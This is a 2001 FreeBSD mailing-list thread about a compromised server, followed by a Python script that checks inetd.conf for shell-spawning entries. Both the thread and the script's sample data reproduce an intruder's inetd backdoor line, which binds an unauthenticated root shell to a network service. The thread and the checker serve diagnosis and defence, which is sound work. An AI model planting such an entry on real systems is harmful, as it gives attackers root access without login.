Date: Thu, 18 Oct 2001 16:44:02 +0000
From: jslivko@4evermail.com <jslivko@4evermail.com>
To: <kstewart@owt.com>
Cc: freebsd-questions@freebsd.org
Subject: Re: I got hacked, I think
Message-ID: <20011018204256.9B25637B403@hub.freebsd.org>

Not to mention there is a new release out, 4.4 :)

-- Jonathan

--- Kent Stewart <kstewart@owt.com> wrote:
>
>
> Tomek wrote:
> >
> > I found out more info.
> >
> > -rw-r--r-- 1 Broot wheel 54 Sep 26 10:24 /inetd.conf
> > -rw-r--r-- 1 Broot wheel 85857 Sep 26 21:38 /sudo- 1.6.3.7_1.tgz
> > -rw------- 1 Broot wheel 4869 Sep 26 10:25 /etc/inetd.conf
> >
> > Checking the bizarre /inetd.conf is shocking:
> > eklogin stream tcp nowait root /bin/sh sh -i
> >
> > I take it that "sh" would not even request a login or anything if called
> > directly from inetd.conf, would it? I am sitting here, he is STILL
> > pinging me and watching the system (even tried to ftp again a few
> > minutes ago), and for the life of me I can't figure out where it all
> > began... who did he even login in the first time, maybe it was some
> > buffer overflow or something.... yuck.
>
> It began because you were using 4.3-release and you probably didn't fix
> the security problems. There were several buffer overflow problems for
> daemons that have been published for 4.3-r. The only solution in case of
> a hacked has been to do a wipe and reinstall.
>
> Kent
>
> >
> > TY for all your help guys, you are all wonderful! I will leave you in
> > peace now (I hope). I still don't know about Broot though...
> >
> > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > with "unsubscribe freebsd-questions" in the body of the message
>
> --
> Kent Stewart
> Richland, WA
> http://users.owt.com/kstewart
>
> Carl Sagan quote on Seti@home
> http://setiathome.ssl.berkeley.edu/pale_blue_dot.html
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-questions" in the body of the message
>

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message
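
A defender-side check for the kind of entry quoted in this thread, added here as an example (it is not code from any of the posters): it parses inetd.conf text, flags services whose server program is a shell, and reports inetd.conf copies that live outside /etc. The shell list, the function names and every sample entry other than the quoted eklogin line are assumptions constructed for illustration.

```python
import os

# Shells that should never be an inetd server program (assumed list, extend as needed).
SHELLS = {"sh", "csh", "tcsh", "bash", "ksh", "zsh"}

def parse_inetd(text):
    """Yield (lineno, fields) for each active (uncommented) inetd.conf entry."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        # service, socket type, protocol, wait/nowait, user, program, [args...]
        if len(fields) >= 6:
            yield lineno, fields

def suspicious_entries(text):
    """Return (lineno, service, user, program) for entries that start a shell."""
    findings = []
    for lineno, f in parse_inetd(text):
        service, user, program, args = f[0], f[4], f[5], f[6:]
        prog_name = os.path.basename(program)
        # argv[0] may differ from the program path, so check both.
        argv0 = os.path.basename(args[0]).lstrip("-") if args else ""
        if prog_name in SHELLS or argv0 in SHELLS:
            findings.append((lineno, service, user, program))
    return findings

def stray_copies(paths, expected="/etc/inetd.conf"):
    """Return inetd.conf files found anywhere other than the expected path."""
    return [p for p in paths
            if os.path.basename(p) == "inetd.conf"
            and os.path.normpath(p) != expected]

# Constructed sample: two ordinary entries plus the line quoted in the thread.
SAMPLE = """\
# constructed sample for illustration
ftp     stream  tcp     nowait  root    /usr/libexec/ftpd       ftpd -l
#telnet stream  tcp     nowait  root    /usr/libexec/telnetd    telnetd
eklogin stream tcp nowait root /bin/sh sh -i
"""

if __name__ == "__main__":
    for lineno, service, user, program in suspicious_entries(SAMPLE):
        print(f"line {lineno}: {service} runs {program} as {user}")
    for path in stray_copies(["/inetd.conf", "/etc/inetd.conf"]):
        print(f"unexpected config copy: {path}")
```
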